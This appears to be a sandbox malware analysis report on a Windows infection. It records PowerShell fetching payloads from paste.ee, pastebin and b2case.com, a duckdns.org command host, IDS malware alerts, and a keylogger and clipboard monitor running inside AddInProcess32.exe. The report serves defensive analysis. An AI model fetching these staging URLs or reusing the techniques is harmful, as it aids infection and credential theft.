                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49748 -> 178.237.33.50:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49734 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49732 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49741 -> 188.114.96.3:443
                    Source: unknownFTP traffic detected: 191.252.83.213:21 -> 192.168.2.4:49730 220 "Servico de FTP da Locaweb"
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,23_2_0041B411
                    Source: global trafficHTTP traffic detected: GET /d/jm8qu/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/d80GV/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /class.txt HTTP/1.1Host: b2case.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/r322U/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: AddInProcess32.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: AddInProcess32.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: ftp.desckvbrat.com.br
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: b2case.com
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: global trafficDNS traffic detected: DNS query: iwarsut775laudrye001.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C6BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://b2case.com
                    Source: powershell.exe, 00000005.00000002.2605240365.0000028054873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://desckvbrat.com.br
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.desckvbrat.com.br
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                    Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                    Source: powershell.exe, 0000000D.00000002.1948758053.000001AB895D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B800B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: AddInProcess32.exeString found in binary or memory: http://www.ebuddy.com
                    Source: AddInProcess32.exeString found in binary or memory: http://www.imvu.com
                    Source: powershell.exe, 00000008.00000002.2115107372.000002D4EB8D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: AddInProcess32.exeString found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B8005F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B8007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C6B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://b2case.com
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B80D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C6B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://b2case.com/class.txt
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1891382694.000002203A54B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D14E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: AddInProcess32.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D8B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DB93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DB96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/d80GV/0
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203DB93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/d80GV/0P
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/jm8qu/0
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/jm8qu/08
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/jm8qu/0P
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C700000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/r322U/0
                    Source: powershell.exe, 0000000D.00000002.1948758053.000001AB893C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 0000000D.00000002.1948758053.000001AB893C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exeString found in binary or memory: https://www.google.com
                    Source: AddInProcess32.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49749 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49751 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000023_2_0040A2F3
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,23_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,23_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,29_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,29_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,30_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,30_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,31_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,31_2_004072B5
